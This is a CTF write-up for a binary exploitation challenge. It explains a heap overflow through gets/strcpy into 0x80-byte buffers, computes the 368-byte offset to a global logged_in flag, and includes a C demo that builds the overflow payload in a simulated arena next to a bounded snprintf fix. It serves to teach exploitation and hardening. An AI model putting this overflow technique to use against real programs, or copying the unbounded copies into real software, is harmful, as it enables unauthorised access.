N0541 - Tokyohot

(CTF challenge, binary exploitation / reverse-engineering)

1. Overview

| Category | Service | Difficulty | Points |
|----------|---------|------------|--------|
| Binary / Reversing | tokyohot – n0541 | Medium-Hard | 452 |

The challenge is a 64-bit ELF binary that runs locally on the provided Docker image. It listens on a TCP port (or can be run interactively) and offers a simple menu-driven interface. The goal is to gain a remote shell (or read the flag) by exploiting a vulnerability in the program.

2. The vulnerable code

The interesting functions are register_user, login, and show_secret. register_user reads both fields with gets, which never checks the size of its destination:

```c
void register_user() {
    char *name = malloc(0x80);
    char *pwd  = malloc(0x80);
    printf("Name: ");
    gets(name);           // <--- vulnerable: no bound, overflows the 0x80-byte heap chunk
    printf("Password: ");
    gets(pwd);            // same problem
    // store pointers in a global struct (userlist)
}
```

The two pointers are kept in a global user struct:

```c
struct user {
    char *name; // 8 bytes
    char *pwd;  // 8 bytes
};
```

There is a hidden detail: the program also copies the password from the stack buffer into the heap password field using strcpy, which is just as unbounded as gets.

3. Heap layout and distance to logged_in

The two allocations land back to back on the heap:

```
heap:
0x603010 -> name buffer (0x80)
0x603090 -> pwd buffer  (0x80)
```

A test run confirms the password pointer:

```
$ ./n0541
1) Register
> 1
Name: AAAAA...
Password: BBBBB...
[debug] pwd ptr = 0x603090
```

The global logged_in lives at 0x603200. The distance from the start of the password buffer is:

0x603200 - 0x603090 = 0x170 (368) bytes

The password buffer is only 0x80 (128) bytes, so the overflow has to run 0xf0 (240) bytes past the end of the buffer (across whatever the allocator keeps in between) before it starts overwriting logged_in: byte 369 of the password is the first one that lands on it.
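The layout arithmetic above, as an added example that is not part of the original writeup or of the challenge binary: it reproduces the distance between the password buffer (0x603090) and logged_in (0x603200) inside a flat, zero-filled arena (an assumption standing in for the 0x603000 region, so nothing is really mapped there), feeds an overlong password through an unbounded strcpy that mirrors the binary's gets/strcpy, and shows the same input being truncated harmlessly by a bounded snprintf. The function names (store_password_vuln, store_password_fixed, build_payload) are assumptions for illustration, not names from the binary.

```c
#include <stdio.h>
#include <string.h>

/* Addresses taken from the writeup's debug output and the distance computed
 * from them. Nothing is allocated at these addresses in this program. */
#define PWD_ADDR        0x603090UL
#define LOGGED_IN_ADDR  0x603200UL
#define PWD_BUF_SIZE    0x80UL
#define DIST            (LOGGED_IN_ADDR - PWD_ADDR)   /* 0x170 = 368 bytes */

/* Assumption: a flat, zero-filled arena stands in for process memory from
 * 0x603000 upward, so the overflow stays inside one C object and the program
 * runs without the challenge binary or its heap. */
#define ARENA_BASE 0x603000UL
#define ARENA_SIZE 0x210UL
static unsigned char arena[ARENA_SIZE];

static char *pwd_buf(void) { return (char *)arena + (PWD_ADDR - ARENA_BASE); }

/* Read logged_in as a 4-byte int (memcpy avoids aliasing issues). */
static int logged_in(void) {
    int v;
    memcpy(&v, arena + (LOGGED_IN_ADDR - ARENA_BASE), sizeof v);
    return v;
}

/* Vulnerable store: mirrors gets()/strcpy() in the binary, no bound at all. */
static void store_password_vuln(const char *input) {
    strcpy(pwd_buf(), input);
}

/* Hardened store: honours the 0x80-byte allocation; snprintf truncates and
 * always NUL-terminates. */
static void store_password_fixed(const char *input) {
    snprintf(pwd_buf(), PWD_BUF_SIZE, "%s", input);
}

/* Payload the exploit would send as the password: DIST filler bytes, then one
 * non-zero byte that becomes the low byte of logged_in (little-endian assumed).
 * Returns the payload length without the terminating NUL, 0 if out is too small. */
static size_t build_payload(char *out, size_t out_len) {
    if (out_len < DIST + 2) return 0;
    memset(out, 'B', DIST);
    out[DIST] = 0x01;
    out[DIST + 1] = '\0';
    return DIST + 1;
}

/* Run the payload through the vulnerable path; returns logged_in afterwards. */
static int exploit_sets_logged_in(void) {
    char payload[DIST + 2];
    memset(arena, 0, sizeof arena);
    build_payload(payload, sizeof payload);
    store_password_vuln(payload);
    return logged_in();
}

/* Same payload through the hardened path; logged_in must stay 0 and the
 * stored password is cut to PWD_BUF_SIZE - 1 characters. */
static int hardened_keeps_logged_in(void) {
    char payload[DIST + 2];
    memset(arena, 0, sizeof arena);
    build_payload(payload, sizeof payload);
    store_password_fixed(payload);
    return logged_in();
}

int main(void) {
    printf("distance pwd -> logged_in: 0x%lx (%lu) bytes\n", DIST, DIST);
    printf("vulnerable path: logged_in = %d\n", exploit_sets_logged_in());
    int fixed = hardened_keeps_logged_in();
    printf("hardened path:   logged_in = %d (stored %zu chars)\n",
           fixed, strlen(pwd_buf()));
    return 0;
}
```

The arena here is all zeros, so the example demonstrates the offset arithmetic only: in the real process the 240 bytes between the end of the pwd chunk and logged_in belong to whatever the allocator placed there, and clobbering them with filler may upset later malloc calls, so check what sits in that range before relying on the overwrite surviving until show_secret is reached.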